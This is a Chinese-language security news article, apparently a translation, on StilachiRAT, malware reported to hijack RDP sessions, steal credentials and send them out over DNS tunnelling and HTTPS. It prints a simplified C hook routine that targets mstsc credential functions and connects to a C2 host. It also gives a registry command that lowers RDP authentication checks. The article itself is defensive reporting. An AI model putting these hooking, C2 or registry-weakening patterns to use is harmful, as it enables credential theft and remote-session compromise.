Microsoft 发布了关于新发现的名为 StilachiRAT 的恶意软件的紧急安全公告,该恶意软件专门针对和泄露来自远程桌面协议 (RDP) 会话的数据。
在针对多个地区的金融机构、政府机构和关键基础设施组织的针对性攻击中,已经观察到这种复杂的恶意软件。
安全专家警告说,这种新威胁具有高级功能,可以捕获凭据、击键,甚至劫持正在进行的 RDP 会话而不被发现。
初始感染通常通过包含恶意附件的网络钓鱼电子邮件或提供漏洞利用工具包的受感染网站发生。
在受害者的系统上执行后,StilachiRAT 通过创建在系统启动时运行的计划任务并修改注册表键来确保安全解决方案不会检测到它来建立持久性。
Microsoft Security 研究人员确定了该恶意软件独特的命令和控制基础设施,该基础设施利用加密的 DNS 隧道和 HTTPS 回调的组合来泄露被盗数据。
对受感染系统的分析表明,StilachiRAT 采用了复杂的反分析技术,包括虚拟机检测和调试器规避功能。
该恶意软件的主要功能侧重于通过挂接到 Windows 远程桌面服务 API 来拦截 RDP 会话数据。
这使它能够捕获登录凭据、监控会话活动,甚至记录整个远程会话以供攻击者稍后查看。
使 StilachiRAT 特别危险的是它能够在不中断合法用户连接的情况下静默运行。
拥有经常使用 RDP 的远程工作人员或管理员的组织面临这种威胁的重大风险,因为受损的会话可能导致网络内的横向移动、数据盗窃和潜在的勒索软件部署。
技术分析和缓解
StilachiRAT 的 RDP 会话劫持功能的核心是通过一种称为 API 挂钩的技术实现的。
该恶意软件将自身注入 mstsc.exe 进程并拦截与凭据处理和加密相关的功能。
以下是在恶意软件中发现的钩子实现的简化表示:-
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
// Hook RDP-related APIs
HookFunction("mstscax.dll", "CredentialsCacheInitialize",
(PVOID)HookedCredentialsCacheInitialize);
HookFunction("mstscax.dll", "EncryptCredentials",
(PVOID)HookedEncryptCredentials);
// Set up exfiltration channel
InitializeC2Communication("c2.stilachi-server.net", 8443);
break;
}
return TRUE;
}启动 API 解析的函数(来源 – Microsoft)
在分析受感染的系统时,Microsoft 发现了一个独特的注册表修改,表明存在 StilachiRAT:
REG ADD "HKCU\Software\Microsoft\Terminal Server Client\Default" /v "AuthenticationLevelOverride" /t REG_DWORD /d "0" /f
Microsoft 建议组织对 RDP 连接实施多因素身份验证,限制 RDP 访问受信任网络,保持系统完全修补,并部署能够识别 API 挂钩技术的端点检测和响应解决方案。
此外,监控异常的 RDP 连接模式并实施网络分段有助于限制潜在危害的影响。
信息来源:https://cybersecuritynews.com/microsoft-warns-of-new-stilachirat/
Acunetix Acunetix Premium AI appscan AppScan Standard(标准版) HCL AppScan WebTest 云安全 五角大楼 人工智能 人类心理学 关税 加密货币 勒索软件 品牌冒充 国家安全 威胁情报 安全漏洞 应用程序安全 恶意软件 数字货币 时事政治 时政 时政新闻 暗网 木马病毒 欺诈管理和网络犯罪 民族国家攻击 漏洞和威胁 特朗普政府 特朗普的 2026 财年预算 社会工程学 移动安全 端点安全 网络安全 网络安全运营 网络攻击和数据泄露 网络犯罪 网络罪犯 网络钓鱼 网络间谍 网络风险 美国贸易代表办公室 脆弱性 间谍软件